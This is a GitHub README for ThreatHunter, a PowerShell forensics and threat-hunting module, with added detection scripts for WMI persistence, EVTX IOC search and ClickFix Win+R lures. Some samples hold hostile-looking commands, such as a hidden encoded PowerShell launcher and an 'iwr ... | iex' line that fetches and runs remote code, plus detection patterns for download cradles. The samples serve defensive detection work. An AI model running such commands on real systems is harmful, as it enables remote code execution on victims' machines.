https://github.com/blwhit/threathunter
Advanced PowerShell DFIR module for forensic analysis, threat hunting, and cmdline investigation in Windows.
- Host: GitHub
- URL: https://github.com/blwhit/threathunter
- Owner: blwhit
- Created: 2025-09-04T15:53:33.000Z (9 months ago)
- Default Branch: main
- Last Pushed: 2026-01-11T19:52:51.000Z (5 months ago)
- Last Synced: 2026-01-11T23:37:50.044Z (5 months ago)
- Topics: cybersecurity, dfir, digital-forensics, evtx-analysis, forensic-analysis, forensics, incident-response, malware-detection, powershell, security, threat-hunting, virustotal, windows
- Language: PowerShell
- Homepage: https://blakekwhite.com
- Size: 1.08 MB
- Stars: 1
- Watchers: 0
- Forks: 0
- Open Issues: 0
Metadata Files:
- Readme: README.md
README

## Overview
ThreatHunter is a comprehensive PowerShell toolkit designed for threat hunting, digital forensics, and incident response (DFIR).
It provides a suite of hunt functions to detect persistence mechanisms, analyze system artifacts, search event logs, and generate detailed forensic reports - all through PowerShell on the command line.
**[Read the Wiki](../../wiki)**
---
## 🎯 Core Capabilities
| Function | Purpose |
|----------|---------|
| **Hunt-ForensicDump** | Forensic collection with interactive HTML reporting |
| **Hunt-Persistence** | Detect 60+ persistence techniques (registry, services, WMI, tasks) |
| **Hunt-Logs** | Event log analysis with caching and IOC detection |
| **Hunt-Browser** | Browser history/extension analysis with tool integration |
| **Hunt-Files** | File hunting by time, content, hashes, and ADS |
| **Hunt-Registry** | Registry search, autoruns, and Run MRU (ClickFix detection) |
| **Hunt-Services** | Service enumeration with svchost DLL resolution |
| **Hunt-Tasks** | Scheduled task analysis with privilege detection |
| **Hunt-VirusTotal** | VirusTotal API integration with auto-upload |
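Permanent WMI event subscriptions are one of the persistence classes a sweep like `Hunt-Persistence` has to cover, and they are easy to miss with autorun-only tooling. The script below is an added example, not ThreatHunter's own code: it walks `root\subscription`, resolves each `__FilterToConsumerBinding` to its filter query and consumer payload, and tags the result with ATT&CK T1546.003. The scoring heuristics, the `Get-WmiPersistence`/`ConvertTo-PersistenceFinding` names and the sample backdoor entry at the end are assumptions made for this example.

```powershell
# Added example, not ThreatHunter code: find permanent WMI event subscriptions
# (ATT&CK T1546.003), one of the persistence classes a Hunt-Persistence style sweep covers.
$Namespace = 'root\subscription'

# A binding's Filter/Consumer properties are object references. Get-CimInstance returns them as
# CimInstance objects; older WMI paths return strings such as '__EventFilter.Name="X"'. Handle both.
function Resolve-WmiRef {
    param($Ref)
    if ($Ref -is [string]) {
        if ($Ref -match '^(?<class>\w+)\.Name="(?<name>.*)"$') { return @{ Class = $Matches['class']; Name = $Matches['name'] } }
        return @{ Class = ''; Name = $Ref }
    }
    return @{ Class = $Ref.CimClass.CimClassName; Name = $Ref.Name }
}

function ConvertTo-PersistenceFinding {
    param(
        [string] $FilterName,
        [string] $Query,
        [string] $ConsumerClass,
        [string] $ConsumerName,
        [string] $Payload      # CommandLineTemplate, ScriptText or ScriptFileName, depending on consumer class
    )
    # Heuristics assumed for this example; they are not the module's own rule set
    $reasons = @()
    if ($ConsumerClass -in 'CommandLineEventConsumer', 'ActiveScriptEventConsumer') { $reasons += 'consumer executes code' }
    if ($Payload -imatch 'powershell|pwsh|cmd\.exe|wscript|cscript|mshta|rundll32|regsvr32|-enc|\biex\b|https?://') { $reasons += 'scriptable payload' }
    if ($Query -imatch 'Win32_PerfFormattedData_PerfOS_System|Win32_LocalTime|Win32_ProcessStartTrace|Win32_LogonSession') { $reasons += 'uptime/time/process/logon trigger' }
    # 'SCM Event Log Filter' bound to an NTEventLogEventConsumer is present on a default Windows install
    $knownDefault = ($FilterName -eq 'SCM Event Log Filter' -and $ConsumerClass -eq 'NTEventLogEventConsumer')
    [pscustomobject]@{
        Technique     = 'T1546.003'
        FilterName    = $FilterName
        Query         = $Query
        ConsumerClass = $ConsumerClass
        ConsumerName  = $ConsumerName
        Payload       = $Payload
        Suspicious    = (-not $knownDefault -and $reasons.Count -gt 0)
        Reasons       = ($reasons -join '; ')
    }
}

function Get-WmiPersistence {
    $bindings = Get-CimInstance -Namespace $Namespace -ClassName __FilterToConsumerBinding -ErrorAction SilentlyContinue
    foreach ($b in $bindings) {
        $f = Resolve-WmiRef $b.Filter
        $c = Resolve-WmiRef $b.Consumer
        $filter = Get-CimInstance -Namespace $Namespace -ClassName __EventFilter -Filter ("Name='{0}'" -f ($f.Name -replace "'", "''")) -ErrorAction SilentlyContinue
        $consumer = $null
        if ($c.Class) { $consumer = Get-CimInstance -Namespace $Namespace -ClassName $c.Class -Filter ("Name='{0}'" -f ($c.Name -replace "'", "''")) -ErrorAction SilentlyContinue }
        $payload = ''
        foreach ($p in 'CommandLineTemplate', 'ScriptText', 'ScriptFileName') {
            if ($consumer -and $consumer.PSObject.Properties[$p] -and $consumer.$p) { $payload = [string]$consumer.$p; break }
        }
        ConvertTo-PersistenceFinding -FilterName $f.Name -Query ([string]$filter.Query) -ConsumerClass $c.Class -ConsumerName $c.Name -Payload $payload
    }
}

# Constructed sample (not from a real host) shaped like the classic uptime-timer WMI backdoor.
# The -enc string is base64 of the UTF-16LE text "AAAA", a stand-in for a real payload.
$finding = ConvertTo-PersistenceFinding -FilterName 'Updater' `
    -Query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240" `
    -ConsumerClass 'CommandLineEventConsumer' -ConsumerName 'Updater' `
    -Payload 'powershell.exe -nop -w hidden -enc QQBBAEEAQQA='
$finding | Format-List

# On a live host:
# Get-WmiPersistence | Where-Object Suspicious | Format-List
```

The sample entry is flagged on all three heuristics (executing consumer, scriptable payload, uptime trigger). On a clean host the only binding you should see is the `SCM Event Log Filter` default, which the function deliberately leaves unflagged; anything else bound to a `CommandLineEventConsumer` or `ActiveScriptEventConsumer` deserves a look at the payload before you decide.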
---
## 🔧 Installation
### Option 1: Install the Module from PS Gallery
```powershell
Install-Module ThreatHunter -Force -AllowClobber
Import-Module ThreatHunter
```
#### Install Module for Temporary Usage
```powershell
Install-Module ThreatHunter -Scope CurrentUser
Import-Module ThreatHunter
# When Done
Uninstall-Module ThreatHunter
```
### Option 2: Install from Git
```powershell
git clone https://github.com/blwhit/ThreatHunter.git
cd .\ThreatHunter\
Import-Module .\ThreatHunter.psd1
```
### Option 3: Install from Web Request
```powershell
Invoke-WebRequest -Uri "https://raw.githubusercontent.com/blwhit/ThreatHunter/refs/heads/main/ThreatHunter.psm1" -OutFile "ThreatHunter.psm1"
Import-Module ".\ThreatHunter.psm1"
```
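Option 3 pulls an unversioned file from the `main` branch, so what gets imported depends on whatever the branch holds at that moment. The function below is an added example, not part of ThreatHunter: it downloads the file, compares its SHA-256 against a value you computed yourself from a reviewed copy (for instance `Get-FileHash` on a git clone at a known commit), deletes the file on mismatch, and only then clears the Mark-of-the-Web and imports it. The function name and the `-ExpectedSha256` parameter are assumptions for this example; the page publishes no hash, so the value must come from you.

```powershell
# Added example, not ThreatHunter code: pin a raw-file download to a known SHA-256 before importing it.
function Install-PinnedModuleFile {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory)] [string] $Uri,
        # Hash you computed from a reviewed copy; nothing on the project page supplies it
        [Parameter(Mandatory)] [string] $ExpectedSha256,
        [string] $OutFile = (Join-Path $PWD 'ThreatHunter.psm1')
    )
    # Windows PowerShell 5.x on older hosts may still default to TLS 1.0; force TLS 1.2 for the download
    [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
    Invoke-WebRequest -Uri $Uri -OutFile $OutFile -UseBasicParsing

    # -ne is case-insensitive in PowerShell, so the hash may be supplied in either case
    $actual = (Get-FileHash -Path $OutFile -Algorithm SHA256).Hash
    if ($actual -ne $ExpectedSha256) {
        Remove-Item -Path $OutFile -Force
        throw "SHA-256 mismatch for $Uri (expected $ExpectedSha256, got $actual); file deleted, nothing imported."
    }

    # Remove the Zone.Identifier stream so RemoteSigned/Unrestricted policies stop blocking or prompting
    Unblock-File -Path $OutFile
    Import-Module $OutFile -Force

    # Return the Hunt-* commands the module exposed, as a quick sanity check that the import worked
    $moduleName = [IO.Path]::GetFileNameWithoutExtension($OutFile)
    Get-Command -Module $moduleName -Name 'Hunt-*' | Select-Object Name
}

# Usage (replace the hash with the one from your reviewed copy):
# Install-PinnedModuleFile -Uri 'https://raw.githubusercontent.com/blwhit/ThreatHunter/refs/heads/main/ThreatHunter.psm1' -ExpectedSha256 '<sha256-of-reviewed-copy>'
```

Prefer a raw URL that names a specific commit rather than `refs/heads/main`, so the pinned hash stays valid until you choose to move it.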
### Troubleshooting Errors:
#### [Problem] Execution Policy is Blocking Module
```
Import-Module : File 'ThreatHunter.psm1' cannot be loaded because running scripts is disabled on this system.
```
#### [Fix] Temporarily set the execution policy for the current PowerShell session only. With `-Scope Process` the change is discarded when the session exits and the machine and user policies are left untouched.
```powershell
Set-ExecutionPolicy Unrestricted -Scope Process
```
---
## 🚀 Quick Examples
```powershell
# Quick forensic dump of the last 3 days; export the EVTX logs to a ZIP
Hunt-ForensicDump -StartDate "3D" -LoadBrowserTool -SkipConfirmation -ExportLogs
# Hunt for persistence (aggressive mode)
Hunt-Persistence -Aggressive
# Search all event logs from the last 7 days for an IOC string
Hunt-Logs -StartDate "7D" -Search "mimikatz"
# Pull all browser history
Hunt-Browser -LoadTool -SkipConfirmation
```
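The `Hunt-Logs` call above relies on two things the module advertises: relative start dates and an IOC search over event logs, including exported EVTX files. As an added example that is not the module's code, the script below implements both with the built-in `Get-WinEvent`. The `D`/`H`/`M` suffixes (days/hours/minutes) and the function names are assumptions for this example; the page only shows `"3D"` and `"7D"`. It searches the event's XML rather than `$_.Message`, because an EVTX exported from another host often has no provider message resources on the analysis machine, which leaves `Message` empty while the `EventData` fields are still present.

```powershell
# Added example, not ThreatHunter code: relative date parsing plus an offline IOC search over an EVTX file.
function ConvertFrom-RelativeDate {
    param(
        [Parameter(Mandatory)] [string] $Value,
        [datetime] $Now = (Get-Date)
    )
    # Relative forms assumed here: <n>D days, <n>H hours, <n>M minutes (the page shows "3D"/"7D")
    if ($Value -match '^(?<n>\d+)\s*(?<u>[DdHhMm])$') {
        $n = [int]$Matches['n']
        switch ($Matches['u'].ToUpperInvariant()) {
            'D' { return $Now.AddDays(-$n) }
            'H' { return $Now.AddHours(-$n) }
            'M' { return $Now.AddMinutes(-$n) }
        }
    }
    # Anything else is treated as an absolute timestamp, e.g. '2026-01-05' or '2026-01-05 13:00'
    return [datetime]::Parse($Value, [Globalization.CultureInfo]::InvariantCulture)
}

function Search-EvtxForIoc {
    param(
        [Parameter(Mandatory)] [string] $Path,     # exported .evtx file
        [Parameter(Mandatory)] [string] $Search,   # case-insensitive substring, e.g. 'mimikatz'
        [string] $StartDate = '7D'
    )
    if (-not (Test-Path -Path $Path)) { throw "EVTX file not found: $Path" }
    $since = ConvertFrom-RelativeDate -Value $StartDate
    # Path + StartTime in the filter hashtable lets the event log reader do the time cut, not PowerShell.
    # Get-WinEvent raises a non-terminating error when nothing matches, hence SilentlyContinue.
    $events = Get-WinEvent -FilterHashtable @{ Path = $Path; StartTime = $since } -ErrorAction SilentlyContinue
    $pattern = [regex]::Escape($Search)
    foreach ($e in $events) {
        $xml  = [xml]$e.ToXml()
        $flat = $xml.OuterXml -replace '\s+', ' '
        if ($flat -imatch $pattern) {
            [pscustomobject]@{
                TimeCreated = $e.TimeCreated
                EventId     = $e.Id
                Provider    = $e.ProviderName
                Computer    = $e.MachineName
                Match       = $Search
                Snippet     = $flat.Substring(0, [Math]::Min(200, $flat.Length))
            }
        }
    }
}

# Usage: last 7 days of an exported Security log, hits written to CSV
# Search-EvtxForIoc -Path .\Security.evtx -Search 'mimikatz' -StartDate '7D' | Export-Csv .\hits.csv -NoTypeInformation
```

Because the function emits objects, the same call can be piped to `Format-Table`, `Export-Csv`, or `Where-Object` for a second filter, which is the "console, CSV, PowerShell objects" pattern the module describes.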
---
## 📋 Requirements
- PowerShell 5.0+
- Windows 7/Server 2008 R2 or later
- Administrator privileges (recommended; required to read the Security event log and other users' profiles and registry hives)
---
## ⚡ Key Features
- **Pure PowerShell** - No compiled binaries or external dependencies
- **Interactive HTML Reports** - Single-file forensic reports with dark/light themes
- **Smart Caching** - Browser and log caching for fast repeated searches
- **Multiple Outputs** - Console, CSV, PowerShell objects
- **Date Filtering** - Flexible relative and absolute date formats
- **MITRE ATT&CK** - Persistence techniques mapped to framework
- **ClickFix Detection** - Analyze Win+R commands for social engineering attacks
- **Offline Analysis** - Process exported EVTX logs and CSV files
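ClickFix lures talk the user into pressing Win+R and pasting a command, and Explorer records what was run in the `RunMRU` key. The script below is an added example, not ThreatHunter's own detection: it reads the key in MRU order (`MRUList` holds the single-letter value names, most recent first, and each entry ends in `\1`), strips the suffix, and flags commands with the traits those lures share. The indicator regexes, the function names and the sample entries are assumptions for this example.

```powershell
# Added example, not ThreatHunter code: parse Win+R history (RunMRU) and flag ClickFix-style commands.
function Test-ClickFixIndicators {
    param([Parameter(Mandatory)] [string] $Command)
    # Heuristics assumed for this example; each is a trait of the "paste this to verify you are human" lure
    $rules = [ordered]@{
        'hidden-window'   = '-w(indowstyle)?\s+h(idden)?|-nop\b|-noprofile'
        'encoded-command' = '-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}'
        'download-cradle' = '\biwr\b|invoke-webrequest|downloadstring|downloadfile|\bcurl\b|\bwget\b|bitsadmin'
        'inline-exec'     = '\biex\b|invoke-expression'
        'lolbin-launcher' = '\bmshta\b|\bregsvr32\b|\brundll32\b|\bmsiexec\b|\bcertutil\b|\bwscript\b|\bcscript\b'
        'remote-url'      = 'https?://'
        'captcha-comment' = '#.*?(captcha|human|verif|robot)'
    }
    foreach ($r in $rules.GetEnumerator()) {
        if ($Command -imatch $r.Value) { $r.Key }
    }
}

function Get-RunMruEntries {
    param(
        # Hashtable of RunMRU values (MRUList plus single-letter entries). Lets the parser run on a
        # constructed sample or values pulled from an offline hive; defaults to the current user's live key.
        [hashtable] $Values
    )
    if (-not $Values) {
        $key = Get-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -ErrorAction SilentlyContinue
        if (-not $key) { return }
        $Values = @{}
        foreach ($p in $key.PSObject.Properties) {
            if ($p.Name -match '^([a-z]|MRUList)$') { $Values[$p.Name] = $p.Value }
        }
    }
    # MRUList gives the order, most recent first; fall back to alphabetical if it is missing
    $order = if ($Values.ContainsKey('MRUList')) { [string]$Values['MRUList'] }
             else { ($Values.Keys | Where-Object { $_ -ne 'MRUList' } | Sort-Object) -join '' }
    $rank = 0
    foreach ($ch in $order.ToCharArray()) {
        $name = [string]$ch
        if (-not $Values.ContainsKey($name)) { continue }
        $cmd = ([string]$Values[$name]) -replace '\\1$', ''
        $ind = @(Test-ClickFixIndicators -Command $cmd)
        [pscustomobject]@{
            Rank       = $rank
            ValueName  = $name
            Command    = $cmd
            Indicators = ($ind -join ',')
            Suspicious = ($ind.Count -ge 2)   # one trait alone (e.g. a URL) is normal Win+R use
        }
        $rank++
    }
}

# Constructed sample (not from a real host): two ordinary Win+R entries and one ClickFix-style lure
$sample = @{
    MRUList = 'cab'
    a       = 'cmd\1'
    b       = 'notepad C:\Users\alice\notes.txt\1'
    c       = 'powershell -w hidden -nop -c "iwr https://example.invalid/verify.txt | iex" # I am not a robot - reCAPTCHA Verification ID: 7811\1'
}
Get-RunMruEntries -Values $sample | Format-Table Rank, Suspicious, Indicators, Command -AutoSize

# On a live host, for the current user's hive:
# Get-RunMruEntries | Where-Object Suspicious
```

In the sample, entry `c` trips five indicators and is the most recent command; `cmd` and the `notepad` path trip none. `RunMRU` only captures Win+R, so a lure that has the victim paste into a PowerShell window leaves its trace in PSReadLine's `ConsoleHost_history.txt` under `%APPDATA%\Microsoft\Windows\PowerShell\PSReadLine` instead, and the same indicator function can be run over those lines. For other users' hives, load `NTUSER.DAT` and read the same relative path.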
---
## 📚 Documentation
- **[Home](../../wiki/Home)** - Module overview and quick start
- **[Hunt-ForensicDump](../../wiki/Hunt-ForensicDump)** - Master forensic collection
- **[Hunt-Persistence](../../wiki/Hunt-Persistence)** - 60+ persistence techniques
- **[Hunt-Logs](../../wiki/Hunt-Logs)** - Event log hunting
- **[Hunt-Browser](../../wiki/Hunt-Browser)** - Browser analysis
- **[Hunt-Files](../../wiki/Hunt-Files)** - File system hunting
- **[Hunt-Registry](../../wiki/Hunt-Registry)** - Registry analysis
- **[Hunt-Services](../../wiki/Hunt-Services)** - Service enumeration
- **[Hunt-Tasks](../../wiki/Hunt-Tasks)** - Scheduled task analysis
- **[Hunt-VirusTotal](../../wiki/Hunt-VirusTotal)** - VirusTotal integration
---
## 🛡️ Use Cases
- **Incident Response** - Quick triage and comprehensive data collection
- **Threat Hunting** - Proactive search for persistence and IOCs
- **Forensic Analysis** - Detailed system artifact examination
---
## 🔗 Resources
- **PowerShell Gallery**: https://www.powershellgallery.com/packages/ThreatHunter/1.0
- **Wiki Documentation**: [View the Wiki](../../wiki)
- **MITRE ATT&CK**: https://attack.mitre.org
- **Issue Tracker**: [Submit an Issue](../../issues)
---
**Author**: [Blake White](https://blakekwhite.com)
**Version**: 1.0
**Last Updated**: Jan 2026